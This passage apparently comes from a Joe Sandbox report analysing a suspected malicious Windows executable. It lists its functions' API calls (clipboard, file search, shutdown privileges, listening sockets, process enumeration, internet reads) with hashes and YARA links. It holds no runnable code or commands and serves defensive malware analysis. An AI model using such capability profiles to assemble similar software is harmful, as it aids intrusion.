                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                              • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                                              • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                              • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                                              Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                              • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                              • _wcscmp.LIBCMT ref: 0046F484
                                                                              • _wcscmp.LIBCMT ref: 0046F49F
                                                                              • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                              • String ID: *.*
                                                                              • API String ID: 713712311-438819550
                                                                              • Opcode ID: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                              • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                                              • Opcode Fuzzy Hash: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                              • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                                              Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf
                                                                              • String ID: 3cA$_A
                                                                              • API String ID: 674341424-3480954128
                                                                              • Opcode ID: 05b7c7ee99c0cb033f712ee82ef3ace6076b9455ad682119e746beb70f6434ad
                                                                              • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                                              • Opcode Fuzzy Hash: 05b7c7ee99c0cb033f712ee82ef3ace6076b9455ad682119e746beb70f6434ad
                                                                              • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                                              Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                              • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                                              • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                              • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                                              Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                              • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                              • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                                              • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                              • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                              Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                              • _memmove.LIBCMT ref: 00450258
                                                                              • _memmove.LIBCMT ref: 0045036D
                                                                              • _memmove.LIBCMT ref: 00450414
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1300846289-0
                                                                              • Opcode ID: 0d99a971cadfccce3dc15f22f8639d8527b3cb7762ed4d8a1051c5a3262cee78
                                                                              • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                                              • Opcode Fuzzy Hash: 0d99a971cadfccce3dc15f22f8639d8527b3cb7762ed4d8a1051c5a3262cee78
                                                                              • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                                              Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                              • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ColorProc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 3744519093-0
                                                                              • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                              • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                              • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                              • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                              Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 99427753-0
                                                                              • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                              • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                              • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                              • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                              Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                              • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                              • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                              • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                              Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                              • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                              • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                              • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                              Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                              • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                              • CoUninitialize.OLE32 ref: 0046C6B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                              • String ID: .lnk
                                                                              • API String ID: 2683427295-24824748
                                                                              • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                              • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                              • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                              • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                              Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                              • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                              • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                              • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                                              Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                              • String ID:
                                                                              • API String ID: 2576544623-0
                                                                              • Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                              • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                                              • Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                              • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                                              Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: 3acc6980ea9a46fe026d42f7af25ac09433a5617d8cc2724b3062d994903d747
                                                                              • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                                              • Opcode Fuzzy Hash: 3acc6980ea9a46fe026d42f7af25ac09433a5617d8cc2724b3062d994903d747
                                                                              • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                                              Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
